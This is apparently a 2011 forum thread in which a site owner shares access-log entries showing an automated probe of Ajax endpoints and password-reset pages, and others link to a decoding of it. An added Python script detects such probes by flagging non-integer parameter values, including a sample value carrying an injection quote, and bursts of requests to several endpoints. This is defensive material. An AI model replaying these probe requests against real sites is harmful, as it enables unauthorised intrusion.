ajax code injection hacking attempt


me

:)

I came across this in my log files today, and thought I'd warn people who
use Ajax. (Could be a well documented thing, I don't know where to check)

77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET /engine/ajax/updates.php?wert=1&user_id=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 HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "POST /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
77.222.40.94 - - [06/Sep/2011:09:07:58 +0200] "GET /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

Marc.
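The three log entries above share one client, one timestamp and three different endpoints, and the value sent in `user_id` is clearly not the integer the application expects. A defender can catch both signals from the access log alone. The script below is an added example, not code from the thread or from the application being probed: it parses combined-format log lines, flags values of parameters that are assumed to be numeric (`user_id`, `wert`, `douser`, taken from the entries above; extend the set for your own endpoints) when they contain anything other than digits, and flags any client that hits three or more distinct paths within the same second. The sample log lines are constructed in the shape of the thread's entries and use documentation IP ranges; the burst threshold is an assumed value to tune to real traffic.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" log format, the shape of the entries quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameters the application treats as integers. Assumption: the names come
# from the log entries in the thread; add your own endpoints' parameters here.
NUMERIC_PARAMS = {"user_id", "wert", "douser"}
NUMERIC_RE = re.compile(r"^\d{1,10}$")

# Distinct paths one client may request within a single second before the
# burst is reported. Assumed threshold, tune to your traffic.
BURST_THRESHOLD = 3

# Constructed sample lines (not the thread's real entries); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges. The first client sends a quote in
# user_id and touches three endpoints in one second; the second is benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Sep/2011:09:07:58 +0200] "GET /engine/ajax/updates.php?wert=1&user_id=1%27 HTTP/1.1" 301 3844 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '203.0.113.5 - - [06/Sep/2011:09:07:58 +0200] "POST /engine/ajax/keywords.php HTTP/1.1" 301 457 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '203.0.113.5 - - [06/Sep/2011:09:07:58 +0200] "GET /index.php?do=lostpassword&douser=1 HTTP/1.1" 301 481 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.7 - - [06/Sep/2011:09:10:03 +0200] "GET /engine/ajax/updates.php?wert=1&user_id=42 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into fields; return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def check_params(rec):
    """Report numeric-only parameters whose value is not a plain integer."""
    findings = []
    for name, values in rec["params"].items():
        if name not in NUMERIC_PARAMS:
            continue
        for v in values:
            # parse_qs removed one layer of percent-encoding; decode once more
            # so a double-encoded value is judged on its real content.
            decoded = unquote(v)
            if not NUMERIC_RE.match(decoded):
                findings.append(
                    f"{rec['ip']} {rec['path']}: {name}={v!r} is not a plain integer"
                )
    return findings


def check_bursts(records, threshold=BURST_THRESHOLD):
    """Report clients that request >= threshold distinct paths in the same second."""
    seen = defaultdict(set)
    for rec in records:
        seen[(rec["ip"], rec["ts"])].add(rec["path"])
    return [
        f"{ip} requested {len(paths)} distinct paths at {ts}"
        for (ip, ts), paths in seen.items()
        if len(paths) >= threshold
    ]


def analyse(lines):
    """Run both checks over an iterable of log lines and return the findings."""
    records = [r for r in (parse_line(line) for line in lines) if r]
    findings = []
    for rec in records:
        findings.extend(check_params(rec))
    findings.extend(check_bursts(records))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

Run against the constructed sample it reports two findings: the non-integer `user_id` on `/engine/ajax/updates.php` and the three-endpoint burst from the same client in one second, while the benign request from the second client passes both checks. Pointing `analyse()` at a real log file (`analyse(open(path))`) is enough to use it as-is; the parameter allowlist is the part worth keeping accurate, because the value check is only as good as the list of parameters the application really restricts to integers.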
 

Michael Haufe (TNO)


I've decoded the above here: http://pastebin.com/1vwJEUw0
 

me

Michael Haufe (TNO) said:
I've decoded the above here: http://pastebin.com/1vwJEUw0

Thanks; googling their server name reveals it's a known attack that's been
around since 2009; more info at: http://pastebin.com/Qtk8jSfR

Marc.
 